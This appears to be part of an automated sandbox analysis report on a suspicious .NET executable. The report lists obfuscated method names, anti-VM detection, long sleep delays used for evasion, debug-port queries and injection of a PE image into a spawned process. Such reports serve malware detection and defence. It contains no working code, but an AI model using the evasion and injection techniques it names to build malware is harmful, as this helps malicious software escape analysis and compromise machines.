Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs	High entropy of concatenated method names: 'cjCuRirHxc', 'LLYuVVJDLu', 'SUguj6ox60', 'nVmuSlT0p6', 'Ctuua8miw3', 'B9ruCxFfdv', 'UShuD8fOLO', 'i7Zu11YRdX', 'kSOub2INuJ', 'dmpuJ019so'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, P6ZjqJ3swucoCPdYU1.cs	High entropy of concatenated method names: 'AMoQhHpXl0', 'lVyQvrqRvM', 'dCQMfsBpWq', 'dqvMlu2gwr', 'vNLMpgPXNC', 'hrIMNt0mq3', 'fIPM51X0e4', 'AklM25R0ai', 'CXeMem2D65', 'PIhMtq0T5d'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, bomrjQeeRO7MjCq9JL.cs	High entropy of concatenated method names: 'Bx1EL81YBC', 'hdvEIsZQt8', 'CdEEAQpET8', 'CgaEPMTC8f', 'GJ0EhUfmPw', 'ob8EkUpQDd', 'c9TEvMSaBD', 'IKZE0UpahS', 'fsEEnCrFrY', 'cHJE350Owh'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, WfRbqtROjKsisi9C2c.cs	High entropy of concatenated method names: 'jNDWt67Piv', 'TMeWxe5oY8', 'B01WRoUl6q', 'n8NWVtkK3C', 'mAZWOnkmTC', 'IGJWfrgwQ4', 'Vq4Wl126G0', 'z7FWpmEkRo', 'aByWN1ENH6', 'RtGW5Lk4KI'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, QmlKtsm8sb4NYGqwub.cs	High entropy of concatenated method names: 'EU5BTrC1VM', 'rifBuvf6H5', 'RitBQiPg01', 'xPJBElHAQa', 'TFcBZ0GMTU', 'Y9GQaWwlPH', 'LWTQCdYIJG', 'Xh1QD38Fbq', 'ge3Q12vKk1', 'OX4QbLmKUO'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, LTk0Go7k75hJh3fWMD.cs	High entropy of concatenated method names: 'xrlsEk0ivW', 'PlAsZKcCUF', 'hMTsqckMym', 'b01syEx6Zj', 'AdYsWU16ml', 'ctssd8sb4N', 'fejxXoucjTS8gbwDkE', 'ChtqQcRkh51Owi4r9a', 'jcgssKuCwF', 'UdqsKgWQvn'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, EEsydkCYx57eeOBB6N.cs	High entropy of concatenated method names: 'YR691wgNFF', 'ECn9J1RxTh', 'VrZow3O1CQ', 'vvMosJQqAs', 'PcR9imLeqp', 'STl9x2k4vG', 'kp696WwSOw', 'b0g9RSJ394', 'Thq9VBO6NX', 'fPI9j7AmLK'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, OFNmdb1Z9H5cTqygQe.cs	High entropy of concatenated method names: 'moIoGPs5dx', 'NmGoul4j2M', 'ciMoMkPcrC', 'PjLoQYrIoJ', 'zBdoBJpVIr', 'u4WoEKAILs', 'COhoZxjXyK', 'Pj0oFXisww', 'DUYoqclf4G', 'xnooyx9l8G'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, wwHVEEjpM51biTRAEV.cs	High entropy of concatenated method names: 'ToString', 'bDpdiaM5yT', 'g4sdOVyhM2', 'nDUdfQXbgL', 'gEWdlsRIdh', 'btwdp6tIeO', 'GBfdNpK2vV', 'SeJd5nHKla', 'iCGd2aZ2ge', 'QAFdejksim'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, dDd5a9goxCsUjXNo8Z.cs	High entropy of concatenated method names: 'J03A5QJ8s', 'ylmPtmKGw', 'ET4kqWpyh', 'wFevCUmXi', 'ln8nOKiun', 'jWT3jqaSU', 'nB3JIunmCehlySBBjg', 'xKTLf7qXsk1FmSg90R', 'f3ocJbEwcGphOLjKmv', 'Xyqo0LrfG'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs	High entropy of concatenated method names: 'lY8KTuG7oE', 'II1KGhN9E0', 'u4gKuieHTc', 'hsIKMvI9FH', 'CrPKQnoxUD', 'PUtKBl7roc', 'NYSKEA9mnT', 'RuTKZ4bVbZ', 'YB9KF4T8H1', 'PT9KqOoH5a'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, KhgswbJRLEXpkhV9SF.cs	High entropy of concatenated method names: 'FfbHstjnVN', 'FEGHK8mOsD', 'lo1H778CcT', 'lw2HGgjA2t', 'RuBHuPkCcQ', 'GXMHQGTQNH', 'GjWHB9HBEH', 'DTxoDbSb8Y', 'r7Zo103HmY', 'ncqobCI0PJ'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, RRfmNsut01lROUp1Bc.cs	High entropy of concatenated method names: 'Dispose', 'RObsb2aLNL', 'vDGgONmm0m', 'r8XddF9kFg', 'MiFsJNmdbZ', 'qH5szcTqyg', 'ProcessDialogKey', 'hedgwaT2vo', 'OTlgsXEGhe', 'jecgg5hgsw'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, K0FH4RswvYbcRDHFRPs.cs	High entropy of concatenated method names: 'GjFHLBcm14', 'AIjHIULV0g', 'lFHHASUMSI', 'nGCHPmZg4P', 'GRFHhllS74', 'FSrHk00eHV', 'qg7HviNEQr', 'iS7H00Wak1', 'qDTHnPdSyV', 'mdsH3ueRU6'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, Y6PglN5RDX6AyO2AUc.cs	High entropy of concatenated method names: 'jkAEGGdER2', 'Nt9EMt2UOD', 'HWgEB0KLOv', 'JjfBJoJdqG', 'PYEBzPA2up', 'qCcEwaq19n', 'pl4Esk8kp1', 'NDVEg0NfrM', 'HfmEKIcHOf', 'igiE7uSXS1'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, HP8UD46YAwT2bhahTv.cs	High entropy of concatenated method names: 'OLWr0B290C', 'jHYrnOAoJZ', 'Hs7rmpTI3e', 'wQwrOPhHDh', 'JoSrlmn8gU', 'E6FrpFQqn6', 'Dd1r5tT6iT', 'UKEr2GNwaV', 'D9VrthhxPs', 'MPprit71jq'

Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR

Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: 1030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: 2B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: 1030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: 7C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: 71B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: 8C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: 9C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: A030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: B030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Memory allocated: C030000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe TID: 3744	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe TID: 7276	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Source: C:\Users\user\Desktop\SCB#89940578.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SCB#89940578.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

2_2_0040317B

Source: C:\Users\user\Desktop\SCB#89940578.exe

Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,

2_2_00402B7C

Source: C:\Users\user\Desktop\SCB#89940578.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SCB#89940578.exe

Memory written: C:\Users\user\Desktop\SCB#89940578.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Users\user\Desktop\SCB#89940578.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
